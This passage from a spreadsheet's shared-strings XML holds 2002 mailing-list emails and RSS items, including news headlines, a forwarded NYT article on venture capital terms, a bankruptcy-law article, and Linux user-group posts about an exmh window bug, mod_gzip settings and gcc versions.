  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: ask &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:23 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:23 -0000</t>
  </si>
  <si>
    <t>Apple Switch parodies</t>
  </si>
  <si>
    <t>URL: [URL]http://www.askbjoernhansen.com[/URL]\nDate: 2002-09-24T02:31:20-08:00\n\nThis Monkey Switch Ad is too funny. Huge smile on my face. :-) It was the \nwinner of a competition MacRumors had set up. (Via Nathan)...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:21 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:21 -0000</t>
  </si>
  <si>
    <t>Don't laugh. This is the real Office</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357900,215/\nDate: 2002-09-29T00:39:54+01:00\n\n*Euan Ferguson* spends two days at the headquarters of a stationery supplier in \nSlough and finds the team is much nicer than Ricky Gervais's gallery of \ngrotesques.*Sketches of pain*[1]\n\n[1] [URL]http://www.newsisfree.com[/URL],6903,800788,00.html</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Kanu at the double</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357898,215/\nDate: 2002-09-29T00:39:56+01:00\n\n*Football:* Kolo Toure was among the goals as Arsenal gave Leeds a good hiding \nat Elland Road.</t>
  </si>
  <si>
    <t>A Windsor in the soup</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357897,215/\nDate: 2002-09-29T00:39:57+01:00\n\n*Comment:* Prince Charles's attempts to meddle in politics show how detached he \nis from real life, says *Nick Cohen*.</t>
  </si>
  <si>
    <t>A matter of opinion</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357899,215/\nDate: 2002-09-29T00:39:55+01:00\n\n*Media*: It only took one column in a newspaper by Rod Liddle, editor of \nradio's flagship new show, to put the BBC under pressure. Jamie Doward and \nVanessa Thorpe report on unease within the corporation's top brass - and how \nthe affair could shape its future</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:18 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:18 -0000</t>
  </si>
  <si>
    <t>The secret passion that staggered Westminster</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357896,215/\nDate: 2002-09-29T00:39:58+01:00\n\n*Politics:* She was vivacious, he was Mr Grey. Theirs was a love no one \nimagined.</t>
  </si>
  <si>
    <t>Last-ditch talks aim to halt tide of violence engulfing West Africa</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357895,215/\nDate: 2002-09-29T00:39:59+01:00\n\n*World latest:* Ivory Coast coup could involve rest of the region in a \nbloodbath.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:17 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:17 -0000</t>
  </si>
  <si>
    <t>Of Muslims and Morris men</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357893,215/\nDate: 2002-09-29T00:40:02+01:00\n\nIt wasn't just the lack of wellies that made this protest different - it was \nthe mix of the marchers, writes *Euan Ferguson*.</t>
  </si>
  <si>
    <t>The Ryder Cup</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8355996,215/\nDate: 2002-09-28T23:38:59+01:00\n\n*Dan Rookwood* and *Lawrence Booth* on how Europe and the United States ended \nall-square to set up a tense final day.</t>
  </si>
  <si>
    <t>New exam fury puts Morris's job in danger</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8357894,215/\nDate: 2002-09-29T00:40:00+01:00\n\n*UK latest:* Sacked regulator accuses her of 'unbearable pressure'.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:01:16 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:01:16 -0000</t>
  </si>
  <si>
    <t>Blair attacks new culture of cynicism</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8358764,215/\nDate: 2002-09-29T01:41:02+01:00\n\nPM rules out compromise on public service reform in hard-hitting pre-conference \ninterview.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Sun, 29 Sep 2002 08:00:02 -0000</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 08:00:02 -0000</t>
  </si>
  <si>
    <t>Advanced CSS lists</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-27T23:22:56-05:00\n\n_Mark Newhouse_: CSS Design: Taming Lists[1]. &amp;#8220;I'll demonstrate how to \nuse CSS to bring unwieldy lists under control. It's time for you to tell lists \nhow to behave, instead of letting them run wild on your web page.&amp;#8221;\n\n\n\n[1] [URL]http://www.alistapart.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.alistapart.com</t>
  </si>
  <si>
    <t>To: fork@xent.com\nFrom: Yahoo!News &lt;refertofriend@reply.yahoo.com&gt;\nDate: Sun, 29 Sep 2002 07:03:02 PDT</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 07:03:02 PDT</t>
  </si>
  <si>
    <t>Yahoo!News &lt;refertofriend@reply.yahoo.com&gt;</t>
  </si>
  <si>
    <t>fork@xent.com</t>
  </si>
  <si>
    <t>Yahoo! News Story - Top Stories</t>
  </si>
  <si>
    <t>**Gary Murphy (garym@canada.com)** has sent you a news article. (Email address\nhas not been verified.)\n\n**Personal message:**\n\n_Top Stories_  \n[URL]http://story.news.yahoo.com[/URL];=/020928/161/2c9nb.html\n\n* * *\n\n|  |  | News Home \- Yahoo! \- Help  \n\n* * *\n\n|  ![Reuters]([URL]http://us.i1.yimg.com[/URL]  \n---|---|---|---  \n---  \nWelcome, Guest |  **Personalize News Home Page**\n![New]([URL]http://us.i1.yimg.com[/URL]  \-   Sign In  \n---|---  \nYahoo! News   Sun, Sep 29, 2002  |  |  | Search |  News StoriesNews\nPhotosAudio/VideoFull CoverageThe New York TimesAll of Yahoo!|  for  |   |  |\nAdvanced  \n---|---|---|---|---|---|---  \n---  \n|  |  News Front Page  \n---|---  \n|  News Photos  \n|  ![]([URL]http://us.i1.yimg.com[/URL] Top Stories  \n|  World  \n|  Entertainment  \n|  Sports  \n|  Science  \n|  Lifestyle  \n|  Politics  \n|  Slideshows  \n|  Editors' Picks  \n|  Most Popular  \n  \nSlideshows  \n---  \n|\n![Photo]([URL]http://us.news1.yimg.com[/URL]  \nSept. 11 Attacks &amp; Terrorism Slideshow A Jordanian youth tours on a camel\nthrough the ancient city of Petra in Jordan, September 29, ...  \n---  \n****| Mideast Conflict  \n---|---  \n****| Ferry Capsizes Off W. Africa  \n---|---  \n****| Thousands Mark Palestinian Uprising in Beirut  \n---|---  \n****| Malaysia Police Arrest Militant Leader  \n---|---  \nMore Top Stories Photos Slideshows  \n---  \n  \n  |  | Top Stories  \n---  \n---  \n  \nPrev. | Start | Next  \n---  \n  \n|  ![Captured weapons-grade uranium weighing more than 33 pounds is on display\nat the paramilitary police headquarters of southeast province of Sanliurfa,\nTurkey, September 28, 2002. Turkish gendarmes seized the uranium and detained\ntwo men accused of smuggling the material, Anatolian Agency said. Authorities\nbelieve the uranium came from an eastern European country and has a value\nabout $5 million. \(Anatolian via\nReuters\)]([URL]http://us.news2.yimg.com[/URL]  \n---  \nSat Sep 28,11:26 AM ET  \n  \nCaptured weapons-grade uranium weighing more than 33 pounds is on display at\nthe paramilitary police headquarters of southeast province of Sanliurfa,\nTurkey, September 28, 2002. Turkish gendarmes seized the uranium and detained\ntwo men accused of smuggling the material, Anatolian Agency said. Authorities\nbelieve the uranium came from an eastern European country and has a value\nabout $5 million. (Anatolian via Reuters)  \n  \n![Mail to Friend]([URL]http://us.i1.yimg.com[/URL]  Email\nPhoto  \n---  \n  \n  \n|  | Search: |  News StoriesNews PhotosAudio/VideoFull CoverageNew York\nTimesAll of Yahoo!|  for  |  |  |  Advanced  \n---|---|---|---|---|---|---  \n|  \n  \n* * *\n\nCopyright 2002 Reuters Limited. All rights reserved. Republication or\nredistribution of Reuters content is expressly prohibited without the prior\nwritten consent of Reuters. Reuters shall not be liable for any errors or\ndelays in the content, or for any actions taken in reliance thereon.  \n  \n  \n---\n\n</t>
  </si>
  <si>
    <t>http://story.news.yahoo.com http://us.i1.yimg.com http://us.i1.yimg.com http://us.i1.yimg.com http://us.news1.yimg.com http://us.news2.yimg.com http://us.i1.yimg.com</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: The Butterfly &lt;salsbury@sculptors.com&gt;\nDate: Sun, 29 Sep 2002 00:57:01 -0700</t>
  </si>
  <si>
    <t>Sun, 29 Sep 2002 00:57:01 -0700</t>
  </si>
  <si>
    <t>The Butterfly &lt;salsbury@sculptors.com&gt;</t>
  </si>
  <si>
    <t>Re: Help! I've lost my exmh-unseen window!</t>
  </si>
  <si>
    <t>-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 In article  you write: &gt;&gt; &gt;&gt;	I'll have to try it with another window manager and see if I can &gt;&gt;get exmh to put it back inside of sane boundaries. I don't have this &gt;&gt;problem with any other windows, though. Just the exmhunseen window. &gt;&gt; &gt; &gt;How about enabling the "Show unseen message count in folder cache" &gt;option? It displays the number of unseen messages next to each folder name &gt;(if greater than 0), so you don't really need the unseen window unless &gt;you're using more sequences than just "unseen". &gt; &gt;Paul &gt; 	As Hal noted, I like to have the unseen window visible in all virtual desktops, even if the main window is minimized. However, I looked through ALL the preferences menus, and didn't see anything resembling "Show unseen message count in folder cache". Where is that? And in what version? (I'm running v2.4 - 06/23/2000 - Creaky, I know.) 	I went into twm with no virtual desktops, and it came up just fine. Going back to Enlightenment I saw the same behavior as before. Then I knew it MUST be something in the window manager, so I went digging. in my  ~/.englightenment/...e_session-XXXXXX.snapshots.0 file I found all the settings that E. uses for remembering border styles, positions, shaded state, etc.  	I have a 1600x1200 screen, and it kept putting my window at 1655x150 (AND had it shaded to boot, so it was tiny as well as offscreen!) 	Searching for 'unseen' in that file found this section: NEW: exmh.Exmh NAME: exmh CLASS: Exmh NEW: unseen.UnseenWin NAME: unseen CLASS: UnseenWin DESKTOP: 0 RES: 1600 1200 WH: 114 173 XY: 1655 150 0 0 LAYER: 4 STICKY: 1 SKIPTASK: 0 SKIPWINLIST: 0 SKIPFOCUS: 0 SHADE: 2 BORDER: PAGER_LEFT_BLUE 	I changed: XY: 1655 150 0 0  	to  XY: 1455 150 0 0	so it would reappear in my viewable space, restarted Enlightenment (CTRL-ALT-End) and then restarted exmh. Bingo! There was my window!  	I quickly told Englightenment to forget everything about that window except is border style, and now have a sveldt little entry like so: NEW: exmh.Exmh NAME: exmh CLASS: Exmh NEW: unseen.UnseenWin NAME: unseen CLASS: UnseenWin BORDER: PAGER_LEFT_BLUE 	Completely an Enlightenment problem, not exmh. (Though I wonder how it got mixed up in the first place? I certainly can't move a window off screen like that. Unless it was part way over then snapped offscreen when shading.) 	Hmm. Weird.  	Anyway, thanks for the suggestions, folks. Hopefully this will be useful to someone scouting the archives in the future... :-)  -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.2 Comment: Don't know what PGP is? Check [URL]http://www.pgpi.org[/URL] iQA/AwUBPZayRIJkhJBJYtPQEQIyzgCg/mMMlKnmP8Cxa/h7b5X0KrJXsLsAoO1N 6dm1Hpj6RnUGPjuUQItBYEC3 =OL5H -----END PGP SIGNATURE----- _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>http://www.pgpi.org https://listman.redhat.com</t>
  </si>
  <si>
    <t>NOR</t>
  </si>
  <si>
    <t>To: webdev@linux.ie\nFrom: Niall O Broin &lt;niall@linux.ie&gt;\nDate: Sun, 28 Jul 2002 23:49:41 +0100</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 23:49:41 +0100</t>
  </si>
  <si>
    <t>[Webdev] Migrating TO W2K</t>
  </si>
  <si>
    <t>Yes, I know, dreadful subject. However, because of customer inistence we\nmust deploy one project on W2K. This will thus be a WAMP project rather than\na LAMP project. Of course as a highly skilled *ix person I can handle these\nWindows toys :-) but can anyone suggest any good educational resources for\nusing Apache, PHP, Perl and MySQL together on W2K. Anyone had to do the same\nand found any particular nasty gotchas (yes, I know about the running\nMicrosoft software one).\n\n\n\nNiall\n\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>To: FoRK &lt;FoRK@xent.com&gt;\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Sun, 28 Jul 2002 23:20:56 -0400</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 23:20:56 -0400</t>
  </si>
  <si>
    <t>NYT: Venture Capitalists Are Taking the Gloves Off</t>
  </si>
  <si>
    <t>The trend isn't news, but some of the details of the ugliness are \ninteresting.   Worth FoRKing for the archives, too.\n\n[URL]http://www.nytimes.com[/URL]\n\n\nJuly 28, 2002\nVenture Capitalists Are Taking the Gloves Off\nBy LYNNLEY BROWNING\n\nThe venture capital world is looking less like a genteel club and more like\na brawling barroom.\n\nVenture capitalists are offering the companies they bankroll increasingly\nhard-knuckled deals that leave little wealth for a start-up's managers or\noriginal backers. The moves are leading some entrepreneurs, desperate for\nmoney, to decry today's investors as bullies. Some venture capitalists are\neven suing rival venture firms, asserting that the tough new terms are\nwiping out the value of their previous investments.\n\n"People are playing hardball," said Ted Dintersmith, a general partner at\nCharles River Ventures, based in Waltham, Mass.\n\nThe bursting of the Internet stock bubble more than two years ago wiped out\nmany venture investments in dot-coms. Now, amid the bear market in stocks\nand limited prospects for investors or young companies to make money soon,\nventure capitalists are looking for novel ways to make money. As a result,\n"private companies are facing the most onerous terms from venture\ncapitalists that we have seen in 20 years," said Steven E. Bochner, a\nsecurities lawyer at Wilson Sonsini Goodrich &amp; Rosati in Palo Alto, Calif.,\nwho represents venture firms.\n\nIn the boom of the late 1990's, venture capitalists chose one of two\noptions. They could be paid back their invested capital, share in profits\nand receive dividends. Or they could convert their preferred shares into\ncommon stock when the private company held an initial public offering or\nwas sold. During that time of huge payouts for newly public and acquired\ncompanies, they usually chose No. 2.\n\nBut with markets now all but dead for initial public offerings and mergers\nand acquisitions, venture capitalists from Silicon Valley to the East Coast\nare increasingly demanding - and getting - both options. This "double dip,"\nknown as "participating preferred," leaves far less potential wealth for a\ncompany's founders and previous investors. Venture capitalists are also\nnegotiating more deals with heightened "liquidation preferences," in which\nstart-ups agree to pay back the initial investment at least two or three\ntimes over.\n\nPreviously, venture capitalists handed over money to a start-up in a lump\nsum. But more are now parceling out funds in tranches, and then only when\nthe new companies reach certain milestones - a sales target, for example,\nor the hiring of a particular chief executive.\n\nThey are even trying to protect their investments through veto rights that\npermit them to block future investments from other venture capitalists who\nmight dilute their stakes, said Mark G. Borden, chairman of the corporate\ndepartment at Hale &amp; Dorr, a law firm based in Boston. As a result, Mr.\nBorden said, a start-up company that casts its lot with a particular\nventure capitalist or group of investors may find itself tethered to those\nbackers and unable to raise new money elsewhere.\n\nENTREPRENEURS particularly dislike one recent trend: venture capitalists\nhave been pushing young companies to agree, retroactively, to lower the\nprices that investors now pay for shares should the start-up be worth less\nwhen it tries to raise more money later. Such a move, known as a "full\nratchet," is intended to prevent an investor's stake from being diluted.\nBut it can significantly reduce or even wipe out the stakes of a company's\noriginal investors and managers, giving the new investors most of the\ncompany for a song.\n\n"If you were in the first round of investors, you generally now get\ncrushed" when a start-up raises more money later, said J. Edmund Colloton,\ngeneral partner and chief operating officer of Bessemer Venture Partners,\nbased in Wellesley Hills, Mass.\n\nConsider Mahi Networks, a private optical networking start-up. In three\nrounds of financing, from September 1999 to November 2001, Mahi raised $110\nmillion from blue-chip venture firms like Benchmark Capital, Sequoia\nCapital, the GE Capital unit of General Electric and the venture arm of\nGoldman Sachs. At one point during the Internet boom, Mahi was valued at\nmore than $180 million.\n\nLast month, though, a new group of smaller-name investors, led by St. Paul\nVenture Capital of Minneapolis, acquired about three-quarters of the\ncompany for $75 million in financing. Before that, Mahi was valued at only\n$25 million, said Chris Rust, Mahi's president and chief executive. But\nmost of that was tied up in employee incentives, including stock options,\nleaving almost no value for existing investors.\n\nDespite having nurtured Mahi with money and advice, the early investors\nchose not to back the company further. With the new, lower valuation,\n"there was effectively no value attributed to all of our previous\ninvestments," said one venture capitalist whose firm was an early backer.\n"We were all completely washed out" in the last round, said the investor,\nwho spoke on condition of anonymity.\n\nThere is no hard data on the prevalence of the newer, tougher terms.\nVenture capitalists are famously secretive about their deals, which are\nprivate and largely unregulated. But ask venture capitalists or securities\nlawyers who work with start-ups, and tales of onerous terms will abound.\n"At the end of the day, the money is coming with strings attached," said\nMark G. Heesen, president of the National Venture Capital Association, a\ntrade group based in Arlington, Va.\n\nThe shift has turned the conventional wisdom on its head. Venture\ncapitalists once loved risk, but no more. The Internet bust and Wall\nStreet's slump have left them scrambling to make money to repay their own\ninvestors and to justify their management fees.\n\nVenture capitalists once clamored to be first in the door of a hot new\ncompany. Now they can usually make money only by being the most recent\ninvestor. "We're certainly looking for later-stage deals, where you get the\nbenefit of the previous investors having taken the risk," said Todd Dagres,\na general partner at Battery Ventures in Wellesley, Mass.\n\nSome entrepreneurs agree to the harsh new terms simply because they have no\nother way to raise cash to survive. But other managers now shun the\ninvestors, whom they call "vulture capitalists," bent on picking the meat\noff a young or struggling start-up. Today's venture capitalists "want to\ntake advantage of you," said George R. Waller, chief executive of Strike\nForce Technologies, an employee-financed software maker in West Orange,\nN.J. Mr. Waller said he had turned away 30 venture firms in recent months\nbecause they had demanded, among other things, hard-to-reach sales\nmilestones.\n\nGeorge J. Nassef, chief executive of ValetNoir, a start-up based in New\nYork that makes marketing software for casinos, said several venture firms\nhad even asked in recent months to have their potential investments secured\nwith receivables, or money owed to ValetNoir by its customers. He turned\nthem all down.\n\nNOT surprisingly, the shift in financing terms is upsetting some venture\nfirms that were early investors in start-ups but are now suffering as the\ncompanies seek to raise additional money at bargain-basement prices.\n\nIn one high-profile case, Benchmark Capital, a blue-chip Silicon Valley\nfirm, sued the Canadian Imperial Bank of Commerce and Juniper Financial\nthis month. Benchmark was an early investor in Juniper, an online financial\nservices concern, having put $20 million into it in early 2000, just before\nthe Internet bubble burst. It also contributed to a second, $94 million\nround that September. Juniper, based in Wilmington, Del., is seeking to\nraise $50 million from Canadian Imperial, which already owns around half\nthe company, but on terms that would sharply dilute Benchmark's original,\nunspecified stake. Benchmark sued to prevent the start-up from raising the\nmoney. All the parties declined to comment on the case, which a Delaware\njudge threw out last week.\n\nSuch friction was rare during the boom, when venture capitalists operated\nlike a competitive but tight-knit fraternity, channeling deals to one\nanother. Start-ups and their backers saw their interests as allied. But in\ntighter markets, "there's a lot of ugly behavior coming out," said Mr.\nBochner, the Wilson Sonsini lawyer. "There's going to be much more\nlitigation like this."\n\n\n\n\n-------------------------------------------------------\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: FoRK@xent.com\nFrom: adam@xent.com (Adam Rifkin)\nDate: Sun, 28 Jul 2002 22:06:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 22:06:11 -0700 (PDT)</t>
  </si>
  <si>
    <t>adam@xent.com (Adam Rifkin)</t>
  </si>
  <si>
    <t>[NYT] A Sudden Rush to Declare Bankruptcy is Expected</t>
  </si>
  <si>
    <t>Welcome to 2002.  Companies that have taken on way too much debt can\nscrew their shareholders and even some of their debt-holders by\ndeclaring bankruptcy, as Enron and Worldcom have done; meanwhile,\nit becomes more difficult for individuals who have similarly taken on\ntoo much debt, to dig their way out of their own holes...\n\nIn my next life, I'm coming back as a corporation.  They get all the\nperks. :)\n\n\n[URL]http://www.nytimes.com[/URL]\n\nA Sudden Rush to Declare Bankruptcy Is Expected\nBy PHILIP SHENON\n\nWASHINGTON, July 26 The compromise bill, which was approved on Thursday\nby Congressional negotiators and is expected to be adopted in both the\nHouse and Senate by the end of next week, will make it much harder for\nAmericans to wipe out their debts when they declare bankruptcy.\n\nAfter the agreement, lawyers around the country said that they had begun\nto receive calls and visits from debtors worried that they needed to\nfile bankruptcy before the old rules lapse next year.\n\n"I've had plenty of calls this morning," said Gary F. Weltmann, a\nconsumer bankruptcy lawyer in Washington. "And I'm telling people that\nthey need to take action now."\n\nMarty K. Courson, a bankruptcy lawyer in San Francisco, said he was\n"getting ready for the onslaught."\n\n"I do think there will be a lot of people trying to use the old rules,"\nhe said.\n\nThe White House announced today that President Bush would sign the bill,\nwhich was scheduled for a final vote in the House late tonight and in\nthe Senate next week. \n\n"The president looks forward to signing that," said Ari Fleischer, the\nWhite House spokesman. "That bill enjoys widespread bipartisan support\nfor good reasons." \n\nThe bill, which had been stalled until this week in a House-Senate\nconference committee, passed both chambers by overwhelming margins more\nthan a year ago. The conference committee approved the bill Thursday\nafter agreeing on an abortion-rights provision that had been the final\nobstacle to passage; the provision will bar anti-abortion protesters\nfrom using the bankruptcy laws to avoid paying court judgments as a\nresult of clinic protests.\n\nThe bill has long been the top legislative priority of the credit card\nand banking industries, which say that many people now abuse the\nbankruptcy system by writing off debts that they should be able to\npay. There were 1.45 million bankruptcy filings last year, a record, up\n19 percent from 2000.\n\n"This legislation restores integrity and accountability to our\nbankruptcy system by offering a fresh start to those who deserve one\nwhile cracking down on those who don't," said Representative F. James\nSensenbrenner Jr., the Wisconsin Republican who is chairman of the House\nJudiciary Committee.\n\nCritics, including top consumer-rights groups, described the bill as a\ngift to lenders in exchange for a recent, drastic increase in campaign\ncontributions to members of Congress. They also said that it would do\nharm to millions of Americans in financial distress as a result of lost\njobs, poor health or divorce.\n\nThe bill's opponents have also questioned the timing of its passage,\nwhich comes in the midst of a Congressional crackdown on abusive\naccounting practices by many of the largest companies, including some of\nthe same financial services companies that have lobbied strenuously for\nthe bankruptcy bill.\n\n"The timing couldn't be worse," said Travis B. Plunkett, the legislative\ndirector of the Consumer Federation of America. "It takes a lot of gall\nfor Congress to make a move like this when so many Americans are\nconcerned about corporate abuses, and when the economy is so shaky." \n\nSenator Paul Wellstone, a Minnesota Democrat who is a leading critic of\nthe bill, said today that "it boggles the mind that at a time when\nAmericans are more economically vulnerable, when they are most in need\nof protection from financial disaster, we would eviscerate the major\nfinancial safety net in our society for the middle class."\n\nBankruptcy lawyers said that the bill would do harm to low- and\nmiddle-income clients who would be saddled with debts that would take\nthem years to pay back. The new law will end the debt-free "fresh start"\nthat many of those debtors had been permitted under the current law.\n\nRecent studies have shown that the average American filing for\nbankruptcy has a median household income well below the national average\nof about $42,000 in 2000. A study cited in Congressional testimony last\nyear showed that the average person filing for bankruptcy had a car that\nwas six to nine years old, and that a quarter of those people had\nmedical debts exceeding $1,000.\n\n"I won't deny that there are people who abuse the bankruptcy system,"\nsaid Mr. Weltmann, the Washington lawyer whose firm calls itself the\nBankruptcy Center. "But there are honest, hard-working folks who are\nreally going to be affected by these changes."\n\nThe bill would impose a means test on debtors, based on median incomes\nin their home states, for bankruptcy filings under Charter 7 of the\nfederal bankruptcy law, which permits debtors to erase most of their\nunsecured debts, like credit card bills.\n\nDebtors with an income above the state median would be barred from\nfiling under Chapter 7 and would instead be required to file instead\nunder Chapter 13, which requires that a portion of the unsecured debt be\nrepaid over time under the court-administered plan.\n\nMr. Courson, the San Francisco lawyer, said that the changes would "hurt\na lot of consumer debtors who really, rightfully belong in Chapter 7."\n\n"My clients, for the most part, are honest and unfortunate people, and\nthey've just got heavy debt," he said. "You can always find some\ncircumstance where a person really went to town with a credit card and\ngot themselves in trouble. But I have people who are just plain old\npoor. My experience is something wildly different than the story that\nthe credit card companies make to Congress."\n\n\n----\naDaM@XeNT.CoM -- .sig double play!\n\n\nAt its peak, there were more than 100 peer-to-peer start-ups. There now\nremain, at most, a couple of dozen companies concentrated in a few\nniches. The main activity of companies venturing into peer to peer is\nfile sharing. But the dozens of overoptimistic forays into alternative\neconomic systems, hyper-sophisticated technologies, and recording\nindustry collaboration turned out to be dead ends.  Peer-to-peer\nauctions, peer-to-peer supply chain management, and peer-to-peer e-mail\nmay have failed because they were ahead of their time. It's more likely\nthey failed because they were just ahead of themselves.  Clearly, the\npublic's appetite for file sharing has increased, and the state of the\nart has improved dramatically. But companies have still not yet found\nsatisfactory business models, thus leaving file sharing's last chapter\nunwritten.\n  -- Gene Kan, [URL]http://story.news.yahoo.com[/URL]\n\n\nXML proxies are add-ons to firewall and network environments that have\nthe ability to monitor XML traffic and apply business rules and IT\npolicies such as security, routing, performance, management,\ntransformation, and connection provisioning.  Current firewalls aren't\nable to peek in the envelope and decipher XML traffic, said report\nauthor Ronald Schmelzer, ZapThink senior analyst.  XML proxies are not\nonly able to understand network protocols, but also the XML-based\ncontent traveling on top of those protocols, Schmelzer said.  ZapThink\nidentifies a slew of new vendors with XML-ready security solutions,\nincluding Flamenco Networks, Forum Systems, Reactivity, Vordel, and\nWestbridge Technology, among others... ZapThink estimates that XML\nrepresents just 2 percent of network traffic today, but that will\nincrease to almost 25 percent by 2006.\n  -- [URL]http://www.internetwk.com[/URL]\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.nytimes.com http://story.news.yahoo.com http://www.internetwk.com http://xent.com</t>
  </si>
  <si>
    <t>To: kevin lyda &lt;kevin@doolin.com&gt;\nFrom: Paul Jakma &lt;paul@clubi.ie&gt;\nDate: Sun, 28 Jul 2002 20:33:24 +0100 (IST)</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 20:33:24 +0100 (IST)</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin@doolin.com&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] weekend projects...</t>
  </si>
  <si>
    <t>On Sun, 28 Jul 2002, kevin lyda wrote:\n\n&gt; 	    mod_gzip_item_include               file    \.htm$\n&gt; 	    mod_gzip_item_include               file    \.html$\n&gt; 	    mod_gzip_item_include               file    \.txt$\n&gt; 	    mod_gzip_item_include               file    \.php$\n&gt; 	    mod_gzip_item_include               file    \.php3$\n&gt; 	    mod_gzip_item_include               file    \.php4$\n&gt; 	    mod_gzip_item_include               file    \.pl$\n&gt; 	    mod_gzip_item_include               mime    text/.*\n&gt; 	    mod_gzip_item_include               mime    httpd/unix-directory\n&gt; 	    mod_gzip_item_include               handler ^perl-script$\n&gt; 	    mod_gzip_item_include               handler ^server-status$\n&gt; 	    mod_gzip_item_include               handler ^server-info$\n\nhmm.. add \.swf and \.class to list of files above that can do with\ncompressing.\n\nregards,\n-- \nPaul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A\nFortune:\nNo matter whether th' constitution follows th' flag or not, th' supreme\ncourt follows th' iliction returns.\n		-- Mr. Dooley\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;\nDate: Sun, 28 Jul 2002 19:29:29 +0100</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 19:29:29 +0100</t>
  </si>
  <si>
    <t>Paul Kelly mentioned:\n&gt; gcc has been as good as or better than pgcc for quite a while. pgcc was\n&gt; was written back in the days when gcc splintered due to a perception of\n&gt; slow progress on the main branch. A number of Linux distributions wound\n&gt; up using egcs, partly derived from the pgcc work as I recall. Happiness\n&gt; was restored to the world with gcc 2.95 and later.\n\nI do not have the time to follow the compiler "wars", but I notice that I\nmust use egcs to build 64 bit SPARC code.\n\nGCC 3 should do it, but because it is so "buggy"[1] it is not worth trying\nto use unless you really want to track down those compiler errors... :(\n\n- Matthew\n\n[1] "buggy" in the sense that its a feature. Many of the problems with GCC 3\nseem to be related to stricter syntax checking. More accurate information\nwill be appreciated.\n\n\n__________________________________________________\nDo You Yahoo!?\nEverything you'll ever need on one web page\nfrom News and Sport to Email and Music Charts\n[URL]http://uk.my.yahoo.com[/URL]\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: irish linux users group &lt;ilug@linux.ie&gt;\nFrom: kevin lyda &lt;kevin@doolin.com&gt;\nDate: Sun, 28 Jul 2002 19:09:29 +0100</t>
  </si>
  <si>
    <t>Sun, 28 Jul 2002 19:09:29 +0100</t>
  </si>
  <si>
    <t>[ILUG] weekend projects...</t>
  </si>
  <si>
